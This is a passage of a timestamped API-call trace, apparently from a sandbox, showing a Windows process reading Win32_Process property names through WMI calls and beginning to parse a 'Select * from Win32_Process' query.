[0563.165] malloc (_Size=0x18) returned 0x189680
[0563.165] IWbemClassObject:Get (in: This=0x367bb0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PrivatePageCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.166] free (_Block=0x189680)
[0563.166] malloc (_Size=0x18) returned 0x189680
[0563.166] lstrlenW (lpString="ProcessId") returned 9
[0563.166] lstrlenW (lpString="creationdate") returned 12
[0563.166] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ProcessId", cchCount2=9) returned 1
[0563.166] free (_Block=0x189680)
[0563.166] IUnknown:Release (This=0x367bb0) returned 0x1
[0563.166] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.166] malloc (_Size=0x18) returned 0x189680
[0563.166] IWbemClassObject:Get (in: This=0x367e60, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.167] free (_Block=0x189680)
[0563.167] malloc (_Size=0x18) returned 0x189680
[0563.167] IWbemClassObject:Get (in: This=0x367e60, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ProcessId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.167] free (_Block=0x189680)
[0563.167] malloc (_Size=0x18) returned 0x189680
[0563.167] lstrlenW (lpString="QuotaNonPagedPoolUsage") returned 22
[0563.167] lstrlenW (lpString="creationdate") returned 12
[0563.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaNonPagedPoolUsage", cchCount2=22) returned 1
[0563.167] free (_Block=0x189680)
[0563.168] IUnknown:Release (This=0x367e60) returned 0x1
[0563.168] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.168] malloc (_Size=0x18) returned 0x189680
[0563.168] IWbemClassObject:Get (in: This=0x368110, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.168] free (_Block=0x189680)
[0563.168] malloc (_Size=0x18) returned 0x189680
[0563.168] IWbemClassObject:Get (in: This=0x368110, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaNonPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.168] free (_Block=0x189680)
[0563.168] malloc (_Size=0x18) returned 0x189680
[0563.168] lstrlenW (lpString="QuotaPagedPoolUsage") returned 19
[0563.169] lstrlenW (lpString="creationdate") returned 12
[0563.169] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPagedPoolUsage", cchCount2=19) returned 1
[0563.169] free (_Block=0x189680)
[0563.169] IUnknown:Release (This=0x368110) returned 0x1
[0563.169] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.169] malloc (_Size=0x18) returned 0x189680
[0563.169] IWbemClassObject:Get (in: This=0x3683c0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.169] free (_Block=0x189680)
[0563.169] malloc (_Size=0x18) returned 0x189680
[0563.169] IWbemClassObject:Get (in: This=0x3683c0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.169] free (_Block=0x189680)
[0563.169] malloc (_Size=0x18) returned 0x189680
[0563.170] lstrlenW (lpString="QuotaPeakNonPagedPoolUsage") returned 26
[0563.170] lstrlenW (lpString="creationdate") returned 12
[0563.170] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPeakNonPagedPoolUsage", cchCount2=26) returned 1
[0563.170] free (_Block=0x189680)
[0563.170] IUnknown:Release (This=0x3683c0) returned 0x1
[0563.170] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.170] malloc (_Size=0x18) returned 0x189680
[0563.170] IWbemClassObject:Get (in: This=0x368670, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.170] free (_Block=0x189680)
[0563.170] malloc (_Size=0x18) returned 0x189680
[0563.171] IWbemClassObject:Get (in: This=0x368670, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakNonPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.171] free (_Block=0x189680)
[0563.171] malloc (_Size=0x18) returned 0x189680
[0563.171] lstrlenW (lpString="QuotaPeakPagedPoolUsage") returned 23
[0563.171] lstrlenW (lpString="creationdate") returned 12
[0563.171] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="QuotaPeakPagedPoolUsage", cchCount2=23) returned 1
[0563.171] free (_Block=0x189680)
[0563.171] IUnknown:Release (This=0x368670) returned 0x1
[0563.171] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.171] malloc (_Size=0x18) returned 0x189680
[0563.172] IWbemClassObject:Get (in: This=0x368920, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.172] free (_Block=0x189680)
[0563.172] malloc (_Size=0x18) returned 0x189680
[0563.172] IWbemClassObject:Get (in: This=0x368920, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuotaPeakPagedPoolUsage", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.172] free (_Block=0x189680)
[0563.172] malloc (_Size=0x18) returned 0x189680
[0563.172] lstrlenW (lpString="ReadOperationCount") returned 18
[0563.172] lstrlenW (lpString="creationdate") returned 12
[0563.172] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ReadOperationCount", cchCount2=18) returned 1
[0563.173] free (_Block=0x189680)
[0563.173] IUnknown:Release (This=0x368920) returned 0x1
[0563.173] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.173] malloc (_Size=0x18) returned 0x189680
[0563.173] IWbemClassObject:Get (in: This=0x368bd0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.173] free (_Block=0x189680)
[0563.173] malloc (_Size=0x18) returned 0x189680
[0563.173] IWbemClassObject:Get (in: This=0x368bd0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.173] free (_Block=0x189680)
[0563.173] malloc (_Size=0x18) returned 0x189680
[0563.174] lstrlenW (lpString="ReadTransferCount") returned 17
[0563.174] lstrlenW (lpString="creationdate") returned 12
[0563.174] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ReadTransferCount", cchCount2=17) returned 1
[0563.174] free (_Block=0x189680)
[0563.174] IUnknown:Release (This=0x368bd0) returned 0x1
[0563.174] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.174] malloc (_Size=0x18) returned 0x189680
[0563.174] IWbemClassObject:Get (in: This=0x368e80, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.174] free (_Block=0x189680)
[0563.174] malloc (_Size=0x18) returned 0x189680
[0563.174] IWbemClassObject:Get (in: This=0x368e80, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ReadTransferCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.175] free (_Block=0x189680)
[0563.175] malloc (_Size=0x18) returned 0x189680
[0563.175] lstrlenW (lpString="SessionId") returned 9
[0563.175] lstrlenW (lpString="creationdate") returned 12
[0563.175] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="SessionId", cchCount2=9) returned 1
[0563.175] free (_Block=0x189680)
[0563.175] IUnknown:Release (This=0x368e80) returned 0x1
[0563.175] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.175] malloc (_Size=0x18) returned 0x189680
[0563.175] IWbemClassObject:Get (in: This=0x2c100b0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.176] free (_Block=0x189680)
[0563.176] malloc (_Size=0x18) returned 0x189680
[0563.176] IWbemClassObject:Get (in: This=0x2c100b0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SessionId", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.176] free (_Block=0x189680)
[0563.176] malloc (_Size=0x18) returned 0x189680
[0563.176] lstrlenW (lpString="Status") returned 6
[0563.176] lstrlenW (lpString="creationdate") returned 12
[0563.176] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="Status", cchCount2=6) returned 1
[0563.176] free (_Block=0x189680)
[0563.176] IUnknown:Release (This=0x2c100b0) returned 0x1
[0563.176] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.176] malloc (_Size=0x18) returned 0x189680
[0563.177] IWbemClassObject:Get (in: This=0x2c10360, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.177] free (_Block=0x189680)
[0563.177] malloc (_Size=0x18) returned 0x189680
[0563.177] IWbemClassObject:Get (in: This=0x2c10360, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.177] free (_Block=0x189680)
[0563.177] malloc (_Size=0x18) returned 0x189680
[0563.177] lstrlenW (lpString="TerminationDate") returned 15
[0563.177] lstrlenW (lpString="creationdate") returned 12
[0563.177] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="TerminationDate", cchCount2=15) returned 1
[0563.178] free (_Block=0x189680)
[0563.178] IUnknown:Release (This=0x2c10360) returned 0x1
[0563.178] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.178] malloc (_Size=0x18) returned 0x189680
[0563.178] IWbemClassObject:Get (in: This=0x2c10610, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.178] free (_Block=0x189680)
[0563.178] malloc (_Size=0x18) returned 0x189680
[0563.178] IWbemClassObject:Get (in: This=0x2c10610, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.178] free (_Block=0x189680)
[0563.178] malloc (_Size=0x18) returned 0x189680
[0563.178] lstrlenW (lpString="ThreadCount") returned 11
[0563.179] lstrlenW (lpString="creationdate") returned 12
[0563.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ThreadCount", cchCount2=11) returned 1
[0563.179] free (_Block=0x189680)
[0563.179] IUnknown:Release (This=0x2c10610) returned 0x1
[0563.179] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.179] malloc (_Size=0x18) returned 0x189680
[0563.179] IWbemClassObject:Get (in: This=0x2c108c0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.179] free (_Block=0x189680)
[0563.179] malloc (_Size=0x18) returned 0x189680
[0563.179] IWbemClassObject:Get (in: This=0x2c108c0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.180] free (_Block=0x189680)
[0563.180] malloc (_Size=0x18) returned 0x189680
[0563.180] lstrlenW (lpString="UserModeTime") returned 12
[0563.180] lstrlenW (lpString="creationdate") returned 12
[0563.180] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="UserModeTime", cchCount2=12) returned 1
[0563.180] free (_Block=0x189680)
[0563.180] IUnknown:Release (This=0x2c108c0) returned 0x1
[0563.180] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.180] malloc (_Size=0x18) returned 0x189680
[0563.180] IWbemClassObject:Get (in: This=0x2c10b70, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.180] free (_Block=0x189680)
[0563.181] malloc (_Size=0x18) returned 0x189680
[0563.181] IWbemClassObject:Get (in: This=0x2c10b70, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.181] free (_Block=0x189680)
[0563.181] malloc (_Size=0x18) returned 0x189680
[0563.181] lstrlenW (lpString="VirtualSize") returned 11
[0563.181] lstrlenW (lpString="creationdate") returned 12
[0563.181] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="VirtualSize", cchCount2=11) returned 1
[0563.181] free (_Block=0x189680)
[0563.181] IUnknown:Release (This=0x2c10b70) returned 0x1
[0563.181] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.182] malloc (_Size=0x18) returned 0x189680
[0563.182] IWbemClassObject:Get (in: This=0x2c10e20, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.182] free (_Block=0x189680)
[0563.182] malloc (_Size=0x18) returned 0x189680
[0563.182] IWbemClassObject:Get (in: This=0x2c10e20, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.183] free (_Block=0x189680)
[0563.183] malloc (_Size=0x18) returned 0x189680
[0563.183] lstrlenW (lpString="WindowsVersion") returned 14
[0563.184] lstrlenW (lpString="creationdate") returned 12
[0563.184] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WindowsVersion", cchCount2=14) returned 1
[0563.184] free (_Block=0x189680)
[0563.184] IUnknown:Release (This=0x2c10e20) returned 0x1
[0563.184] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.184] malloc (_Size=0x18) returned 0x189680
[0563.184] IWbemClassObject:Get (in: This=0x2c110d0, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.184] free (_Block=0x189680)
[0563.184] malloc (_Size=0x18) returned 0x189680
[0563.184] IWbemClassObject:Get (in: This=0x2c110d0, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.185] free (_Block=0x189680)
[0563.185] malloc (_Size=0x18) returned 0x189680
[0563.185] lstrlenW (lpString="WorkingSetSize") returned 14
[0563.185] lstrlenW (lpString="creationdate") returned 12
[0563.185] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WorkingSetSize", cchCount2=14) returned 1
[0563.185] free (_Block=0x189680)
[0563.185] IUnknown:Release (This=0x2c110d0) returned 0x1
[0563.185] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.185] malloc (_Size=0x18) returned 0x189680
[0563.185] IWbemClassObject:Get (in: This=0x2c11380, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.185] free (_Block=0x189680)
[0563.185] malloc (_Size=0x18) returned 0x189680
[0563.186] IWbemClassObject:Get (in: This=0x2c11380, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.186] free (_Block=0x189680)
[0563.186] malloc (_Size=0x18) returned 0x189680
[0563.186] lstrlenW (lpString="WriteOperationCount") returned 19
[0563.186] lstrlenW (lpString="creationdate") returned 12
[0563.186] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WriteOperationCount", cchCount2=19) returned 1
[0563.186] free (_Block=0x189680)
[0563.186] IUnknown:Release (This=0x2c11380) returned 0x1
[0563.186] SafeArrayGetElement (in: psa=0x2fbf10, rgIndices=0xaf198, pv=0xaf148 | out: pv=0xaf148) returned 0x0
[0563.186] malloc (_Size=0x18) returned 0x189680
[0563.187] IWbemClassObject:Get (in: This=0x2c11630, wszName="Name", lFlags=0, pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0 | out: pVal=0xaf248*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteTransferCount", varVal2=0xffa78408), pType=0x0, plFlavor=0x0) returned 0x0
[0563.187] free (_Block=0x189680)
[0563.187] malloc (_Size=0x18) returned 0x189680
[0563.187] IWbemClassObject:Get (in: This=0x2c11630, wszName="Derivation", lFlags=0, pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0 | out: pVal=0xaf260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteTransferCount", varVal2=0xffa63668), pType=0x0, plFlavor=0x0) returned 0x0
[0563.187] free (_Block=0x189680)
[0563.187] malloc (_Size=0x18) returned 0x189680
[0563.187] lstrlenW (lpString="WriteTransferCount") returned 18
[0563.187] lstrlenW (lpString="creationdate") returned 12
[0563.187] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WriteTransferCount", cchCount2=18) returned 1
[0563.187] free (_Block=0x189680)
[0563.188] IUnknown:Release (This=0x2c11630) returned 0x1
[0563.188] IUnknown:Release (This=0x357630) returned 0x1
[0563.192] IUnknown:Release (This=0x320380) returned 0x0
[0563.192] free (_Block=0x189660)
[0563.192] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.192] free (_Block=0x18ce80)
[0563.192] malloc (_Size=0x70) returned 0x18ce80
[0563.192] malloc (_Size=0x8) returned 0x18cf00
[0563.192] malloc (_Size=0x18) returned 0x189660
[0563.192] SysStringLen (param_1="creationdate") returned 0xc
[0563.192] malloc (_Size=0x1a) returned 0x18cf20
[0563.193] SysStringLen (param_1="creationdate") returned 0xc
[0563.193] malloc (_Size=0x8) returned 0x18cf50
[0563.193] free (_Block=0x189660)
[0563.193] free (_Block=0x18ce30)
[0563.193] lstrlenW (lpString="creationdate") returned 12
[0563.193] malloc (_Size=0x1a) returned 0x18ce30
[0563.193] lstrlenW (lpString="creationdate") returned 12
[0563.193] free (_Block=0x18cf20)
[0563.193] free (_Block=0x18cf50)
[0563.193] free (_Block=0x18cf00)
[0563.194] free (_Block=0x18ce80)
[0563.194] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.194] malloc (_Size=0x38) returned 0x1886c0
[0563.194] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.194] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select"
[0563.194] malloc (_Size=0x18) returned 0x189660
[0563.194] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*"
[0563.194] lstrlenW (lpString="FROM") returned 4
[0563.194] lstrlenW (lpString="*") returned 1
[0563.194] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
[0563.195] malloc (_Size=0x18) returned 0x189680
[0563.195] free (_Block=0x189660)
